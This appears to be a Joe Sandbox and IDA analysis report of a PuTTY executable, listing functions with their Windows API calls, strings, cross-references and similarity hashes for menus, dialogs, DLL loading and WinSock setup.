GetDeviceCaps.GDI32 ref: 00007FF6BB2856EF
GetDeviceCaps.GDI32 ref: 00007FF6BB2856FF
ReleaseDC.USER32 ref: 00007FF6BB285711
GetWindowRect.USER32 ref: 00007FF6BB2858AB
GetClientRect.USER32 ref: 00007FF6BB2858C0
SetWindowPos.USER32 ref: 00007FF6BB285967
CreateBitmap.GDI32 ref: 00007FF6BB2859CA
CreateCaret.USER32 ref: 00007FF6BB2859FB
SetScrollInfo.USER32 ref: 00007FF6BB285A5E
GetDoubleClickTime.USER32 ref: 00007FF6BB285A78
GetSystemMenu.USER32 ref: 00007FF6BB285A8D
CreatePopupMenu.USER32 ref: 00007FF6BB285A9A
AppendMenuA.USER32 ref: 00007FF6BB285AC0
AppendMenuA.USER32 ref: 00007FF6BB285AD8
CreateMenu.USER32 ref: 00007FF6BB285ADA
DeleteMenu.USER32 ref: 00007FF6BB285B0F
AppendMenuA.USER32 ref: 00007FF6BB285B47
AppendMenuA.USER32 ref: 00007FF6BB285B8A

Strings

Running with restricted process ACL, xrefs: 00007FF6BB285D59
&Full Screen, xrefs: 00007FF6BB285BA3
Rese&t Terminal, xrefs: 00007FF6BB285B9C
&Copy, xrefs: 00007FF6BB285AA7
&Duplicate Session, xrefs: 00007FF6BB285C5C
C&lear Scrollback, xrefs: 00007FF6BB285B95
C&opy All to Clipboard, xrefs: 00007FF6BB285CAC
Sa&ved Sessions, xrefs: 00007FF6BB285C74
&About %s, xrefs: 00007FF6BB285BAA
(No sessions), xrefs: 00007FF6BB285B78
Ne&w Session..., xrefs: 00007FF6BB285C48
(, xrefs: 00007FF6BB2854AF
&Paste, xrefs: 00007FF6BB285AC9
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB2857C0
Chan&ge Settings..., xrefs: 00007FF6BB285C88
Unable to create terminal window: %s, xrefs: 00007FF6BB285646
&Help, xrefs: 00007FF6BB285D34
term->mouse_select_clipboards[0] == CLIP_LOCAL, xrefs: 00007FF6BB2857B9
&Event Log, xrefs: 00007FF6BB285C24

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Menu$CreateWindow$Append$Rect$CapsClientDeviceInfoMonitor$BitmapCaretClickDeleteDesktopDoubleErrorFromLastPopupReleaseScrollSystemTime
String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
API String ID: 1687698585-3101482697
Opcode ID: c448718cc976d47d253a2b85655779bf2f23bbd5fc2b1b4af058b8bc99aff5df
Instruction ID: 0dd76148b71e51c21c56c34d25a0f6df1e9c81cdda1e54bad9529e324d1e17c8
Opcode Fuzzy Hash: c448718cc976d47d253a2b85655779bf2f23bbd5fc2b1b4af058b8bc99aff5df
Instruction Fuzzy Hash: 9F522831A0864286FB14DB29ED517BE27A1BF8CB84F684035DA4EC3BB5DE7DE4458B40

Function 00007FF6BB2A2C60 Relevance: 60.0, APIs: 26, Strings: 8, Instructions: 508
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32 ref: 00007FF6BB2A2D78
SendMessageA.USER32 ref: 00007FF6BB2A2D96
MapDialogRect.USER32 ref: 00007FF6BB2A2DC5
CreateWindowExA.USER32 ref: 00007FF6BB2A2E31
SendMessageA.USER32 ref: 00007FF6BB2A2E48
SendMessageA.USER32 ref: 00007FF6BB2A2E5C
MapDialogRect.USER32 ref: 00007FF6BB2A2E74
CreateWindowExA.USER32 ref: 00007FF6BB2A2EE3
SendMessageA.USER32 ref: 00007FF6BB2A2EFA
SendMessageA.USER32 ref: 00007FF6BB2A2F0E
SendMessageA.USER32 ref: 00007FF6BB2A30A1
SendMessageA.USER32 ref: 00007FF6BB2A30D0
SendMessageA.USER32 ref: 00007FF6BB2A312B
SendMessageA.USER32 ref: 00007FF6BB2A313E
SendMessageA.USER32 ref: 00007FF6BB2A3181
GetDlgItem.USER32 ref: 00007FF6BB2A3220
DestroyWindow.USER32 ref: 00007FF6BB2A322A
KillTimer.USER32 ref: 00007FF6BB2A3252
MessageBoxA.USER32 ref: 00007FF6BB2A3282
SendMessageA.USER32 ref: 00007FF6BB2A32DD
SetTimer.USER32 ref: 00007FF6BB2A33ED
ShowWindow.USER32 ref: 00007FF6BB2A3441

Part of subcall function 00007FF6BB2A4A30: SetWindowTextA.USER32 ref: 00007FF6BB2A4A48
Part of subcall function 00007FF6BB2A4A30: GetWindowLongPtrA.USER32 ref: 00007FF6BB2A4A5F

Part of subcall function 00007FF6BB2A5130: SendMessageA.USER32 ref: 00007FF6BB2A516E
Part of subcall function 00007FF6BB2A5130: GetClientRect.USER32 ref: 00007FF6BB2A5184
Part of subcall function 00007FF6BB2A5130: MapDialogRect.USER32 ref: 00007FF6BB2A519E

SendMessageA.USER32 ref: 00007FF6BB2A3533
InvalidateRect.USER32 ref: 00007FF6BB2A3544
SetFocus.USER32 ref: 00007FF6BB2A354D

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c, xrefs: 00007FF6BB2A2FFC, 00007FF6BB2A331F
Cate&gory:, xrefs: 00007FF6BB2A2E22
STATIC, xrefs: 00007FF6BB2A2E1B
firstpath, xrefs: 00007FF6BB2A3318
Demo screenshot failure, xrefs: 00007FF6BB2A326F
@, xrefs: 00007FF6BB2A3158
j == ctrl_path_elements(s->pathname) - 1, xrefs: 00007FF6BB2A2FF5
SysTreeView32, xrefs: 00007FF6BB2A2ECA

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Message$Send$Window$Rect$Dialog$CreateTimer$ClientDestroyFocusIconInvalidateItemKillLoadLongShowText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$firstpath$j == ctrl_path_elements(s->pathname) - 1
API String ID: 443372750-407257924
Opcode ID: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
Instruction ID: fe70232a7294c5a0e1040babc99a1fcae60aa903f30f38c21a9c7e96aa5f2063
Opcode Fuzzy Hash: 1e88966224fd870200e04f82941f27a47510af761bce352db075fa57f9858920
Instruction Fuzzy Hash: A732A032B08A8681EB209B1AE5547BA77A0FB8CB94F544135DF4D87BA9DF3CE045CB40

Function 00007FF6BB2851DF Relevance: 47.4, APIs: 12, Strings: 15, Instructions: 102
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClipboardFormatA.USER32 ref: 00007FF6BB2851F0

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetProcAddress.KERNEL32 ref: 00007FF6BB285244
GetProcAddress.KERNEL32 ref: 00007FF6BB285257
GetProcAddress.KERNEL32 ref: 00007FF6BB28527E
GetProcAddress.KERNEL32 ref: 00007FF6BB2852A5
GetProcAddress.KERNEL32 ref: 00007FF6BB2852B8
GetProcAddress.KERNEL32 ref: 00007FF6BB2852CB
GetProcAddress.KERNEL32 ref: 00007FF6BB2852FD
GetProcAddress.KERNEL32 ref: 00007FF6BB285324
GetProcAddress.KERNEL32 ref: 00007FF6BB285337
CoInitializeEx.COMBASE ref: 00007FF6BB28535D
MessageBoxA.USER32 ref: 00007FF6BB285390

Strings

shcore.dll, xrefs: 00007FF6BB28521F
Failed to initialize COM subsystem, xrefs: 00007FF6BB28537E
user32.dll, xrefs: 00007FF6BB285201
GetMonitorInfoA, xrefs: 00007FF6BB285294
MonitorFromPoint, xrefs: 00007FF6BB2852AE
FlashWindowEx, xrefs: 00007FF6BB285233
winmm.dll, xrefs: 00007FF6BB285210
ToUnicodeEx, xrefs: 00007FF6BB28524D
GetDpiForMonitor, xrefs: 00007FF6BB2852F3
PlaySoundA, xrefs: 00007FF6BB285274
GetSystemMetricsForDpi, xrefs: 00007FF6BB285313
AdjustWindowRectExForDpi, xrefs: 00007FF6BB28532D
MSWHEEL_ROLLMSG, xrefs: 00007FF6BB2851EA
%s Fatal Error, xrefs: 00007FF6BB28536F
MonitorFromWindow, xrefs: 00007FF6BB2852C1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc$ClipboardFormatInitializeLibraryLoadMessageRegister
String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MSWHEEL_ROLLMSG$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll
API String ID: 4030309821-128400427
Opcode ID: d906d41c0339aff394c671c6e556824cebb2af695a482280fecdf5463a9332f4
Instruction ID: ef163c36a6fdb16fa7120b8b08faf01feef2e69b040631b21640512b006fa35a
Opcode Fuzzy Hash: d906d41c0339aff394c671c6e556824cebb2af695a482280fecdf5463a9332f4
Instruction Fuzzy Hash: 7F412920A0DB0290FA55AB1CED501BC63A1BF4DB91F550232CA4ECB6B5EF3CE546C741

Function 00007FF6BB2A6F7C Relevance: 28.5, APIs: 6, Strings: 10, Instructions: 463COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32 ref: 00007FF6BB2A783B

Part of subcall function 00007FF6BB2A5520: GetDC.USER32 ref: 00007FF6BB2A5556
Part of subcall function 00007FF6BB2A5520: SetMapMode.GDI32 ref: 00007FF6BB2A55A5
Part of subcall function 00007FF6BB2A5520: MapDialogRect.USER32 ref: 00007FF6BB2A55CC
Part of subcall function 00007FF6BB2A5520: SendMessageA.USER32 ref: 00007FF6BB2A55E8
Part of subcall function 00007FF6BB2A5520: SelectObject.GDI32 ref: 00007FF6BB2A55F4
Part of subcall function 00007FF6BB2A5520: GetTextExtentExPointA.GDI32 ref: 00007FF6BB2A5639

Strings

(ctrl->columns.ncols == 1) ^ (ncols == 1), xrefs: 00007FF6BB2A694B
win, xrefs: 00007FF6BB2A8169, 00007FF6BB2A82A7
thisc, xrefs: 00007FF6BB2A8137, 00007FF6BB2A8275
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A6952, 00007FF6BB2A6984, 00007FF6BB2A801D, 00007FF6BB2A804C, 00007FF6BB2A80AF, 00007FF6BB2A813E, 00007FF6BB2A8170, 00007FF6BB2A827C, 00007FF6BB2A82AE
&, xrefs: 00007FF6BB2A7028
ncols <= lenof(columns), xrefs: 00007FF6BB2A697D
STATIC, xrefs: 00007FF6BB2A7B5A
ret == c, xrefs: 00007FF6BB2A8016, 00007FF6BB2A8045
!dp->shortcuts[s], xrefs: 00007FF6BB2A80A8
EDIT, xrefs: 00007FF6BB2A7812

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Text$DialogExtentItemMessageModeObjectPointRectSelectSend
String ID: !dp->shortcuts[s]$&$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$EDIT$STATIC$ncols <= lenof(columns)$ret == c$thisc$win
API String ID: 3577962795-4092102353
Opcode ID: 40d984a6187ebbd6d85d28eb717b3bda6f27a275106423ffb23d571dcea61b7f
Instruction ID: 922309e4d54713f54c427a52fda0a57111f5cab61559fdb38a937efa9d70fe8c
Opcode Fuzzy Hash: 40d984a6187ebbd6d85d28eb717b3bda6f27a275106423ffb23d571dcea61b7f
Instruction Fuzzy Hash: 75229F72A08AC285EB219B1DE5503BAB7A0FB88784F445135DF8E877A5EF3DE544CB40

Function 00007FF6BB28CB24 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

can't open input file '%s', xrefs: 00007FF6BB28CDAE
-pgpfp, xrefs: 00007FF6BB28CBD0
%s expects an output filename, xrefs: 00007FF6BB28CD62
demo-server.example.com, xrefs: 00007FF6BB28CE4E, 00007FF6BB28CF53
-demo-config-box, xrefs: 00007FF6BB28CBD7
--host-ca, xrefs: 00007FF6BB28CCDD
unexpected argument "%s", xrefs: 00007FF6BB28CE02
-demo-terminal, xrefs: 00007FF6BB28CD31
--host_ca, xrefs: 00007FF6BB28CD0B
This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 00007FF6BB28CED1
%s Warning, xrefs: 00007FF6BB28CEE3
unknown option "%s", xrefs: 00007FF6BB28CD4C
option "%s" requires an argument, xrefs: 00007FF6BB28CC79
%s expects input and output filenames, xrefs: 00007FF6BB28CE0E
-cleanup, xrefs: 00007FF6BB28CC93

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize
String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
API String ID: 1128191211-528882638
Opcode ID: 8eb59c83080c0d631c84100cf993d58b33c087bafd6a63c7069fc7273af7003d
Instruction ID: abf1387b0833d5207dacc1330a5655bd0a3d281a6a7d2cd035a21a0f76ec85e9
Opcode Fuzzy Hash: 8eb59c83080c0d631c84100cf993d58b33c087bafd6a63c7069fc7273af7003d
Instruction Fuzzy Hash: 58B12A20A0C50345FE64A72DAA512BE2291BF8DB84F444536EB0ECB7F6DFBDE5468341

Function 00007FF6BB28D100 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,?,?,00007FF6BB285201), ref: 00007FF6BB28D139

Strings

hhctrl.ocx, xrefs: 00007FF6BB28D11B
Software\SimonTatham\PuTTY\CHMPath, xrefs: 00007FF6BB28D21C
HtmlHelpA, xrefs: 00007FF6BB28D12F
Software\SimonTatham\PuTTY64\CHMPath, xrefs: 00007FF6BB28D201

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
API String ID: 190572456-509675872
Opcode ID: 69169b5bba90fc67779bf3db5b2d0be0adfe4cb0f604ae176d74eaf2f8015780
Instruction ID: 66b1e1642cc3d2a478d50d4adf1f36dd5c9af75d61e54a487f3c988ffdbf06c2
Opcode Fuzzy Hash: 69169b5bba90fc67779bf3db5b2d0be0adfe4cb0f604ae176d74eaf2f8015780
Instruction Fuzzy Hash: A9312660E0DB4390FF66A72DAD5537926A0BF0D790F644179DA0DC67F1EE7CA4888B10

Function 00007FF6BB2FA3E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2FA439
GetUserNameA.ADVAPI32 ref: 00007FF6BB2FA4C9
GetUserNameA.ADVAPI32 ref: 00007FF6BB2FA4FE

Strings

secur32.dll, xrefs: 00007FF6BB2FA40F
GetUserNameExA, xrefs: 00007FF6BB2FA42F
sspicli.dll, xrefs: 00007FF6BB2FA41E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: NameUser$AddressProc
String ID: GetUserNameExA$secur32.dll$sspicli.dll
API String ID: 9235790-676772081
Opcode ID: 72b76cc023e89e091b16b71414a733de706dd784cfa7de76d89a32719819871b
Instruction ID: 7de36fa9dbf158a24c2eca96f87b5e810fe3cfafa3023666b78587bdf4caf61e
Opcode Fuzzy Hash: 72b76cc023e89e091b16b71414a733de706dd784cfa7de76d89a32719819871b
Instruction Fuzzy Hash: D531AE20E1C66246FA20972D99143BE62A1FF8DB80F508035CF4E87BE5DE3CE806CB00

Function 00007FF6BB2BE2C0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 320
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE309
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE32B
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE34F
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE380
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE3A0
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE3C0
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE3FA
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE422
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE446
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE46A
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE48E
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE4B2
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE4D6
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE4FA
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE51E
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE542
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE566
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE58A
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE5AE
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE5D2
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE5F6
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE61A
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE63E
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE662
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE686
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE6AA
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE6CE
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE6F2
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE716
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE73A
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE75E
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE782
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE7A6
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE7CA
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE7EE
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE812
GetProcAddress.KERNEL32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE836
WSAStartup.WS2_32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE994
WSAStartup.WS2_32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE9B6
WSAStartup.WS2_32(?,?,?,?,00007FF6BB2851C1), ref: 00007FF6BB2BE9D8

Strings

getpeername, xrefs: 00007FF6BB2BE7E7
freeaddrinfo, xrefs: 00007FF6BB2BE348, 00007FF6BB2BE399
htons, xrefs: 00007FF6BB2BE583
WSACleanup, xrefs: 00007FF6BB2BE4F3
setsockopt, xrefs: 00007FF6BB2BE6EB
shutdown, xrefs: 00007FF6BB2BE77B
WSAAddressToStringA, xrefs: 00007FF6BB2BE3F3
socket, xrefs: 00007FF6BB2BE70F
connect, xrefs: 00007FF6BB2BE6A3
WSAAsyncSelect, xrefs: 00007FF6BB2BE41B
getservbyname, xrefs: 00007FF6BB2BE613
ntohs, xrefs: 00007FF6BB2BE5A7
WSAIoctl, xrefs: 00007FF6BB2BE82F
recv, xrefs: 00007FF6BB2BE80B
inet_ntop, xrefs: 00007FF6BB2BE67F
listen, xrefs: 00007FF6BB2BE733
getnameinfo, xrefs: 00007FF6BB2BE3B9
WSAEnumNetworkEvents, xrefs: 00007FF6BB2BE4AB
ws2_32.dll, xrefs: 00007FF6BB2BE2C4
wship6.dll, xrefs: 00007FF6BB2BE35E
Unable to load any WinSock library, xrefs: 00007FF6BB2BEA07
select, xrefs: 00007FF6BB2BE463
accept, xrefs: 00007FF6BB2BE7C3
closesocket, xrefs: 00007FF6BB2BE517
Unable to initialise WinSock, xrefs: 00007FF6BB2BEA13
bind, xrefs: 00007FF6BB2BE6C7
WSAEventSelect, xrefs: 00007FF6BB2BE43F
inet_addr, xrefs: 00007FF6BB2BE637
WSAStartup, xrefs: 00007FF6BB2BE4CF
inet_ntoa, xrefs: 00007FF6BB2BE65B
getaddrinfo, xrefs: 00007FF6BB2BE2FF, 00007FF6BB2BE324, 00007FF6BB2BE376
send, xrefs: 00007FF6BB2BE757
ioctlsocket, xrefs: 00007FF6BB2BE79F
htonl, xrefs: 00007FF6BB2BE55F
gethostname, xrefs: 00007FF6BB2BE5CB
ntohl, xrefs: 00007FF6BB2BE53B
WSAGetLastError, xrefs: 00007FF6BB2BE487
gethostbyname, xrefs: 00007FF6BB2BE5EF
wsock32.dll, xrefs: 00007FF6BB2BE2E3

Memory Dump Source

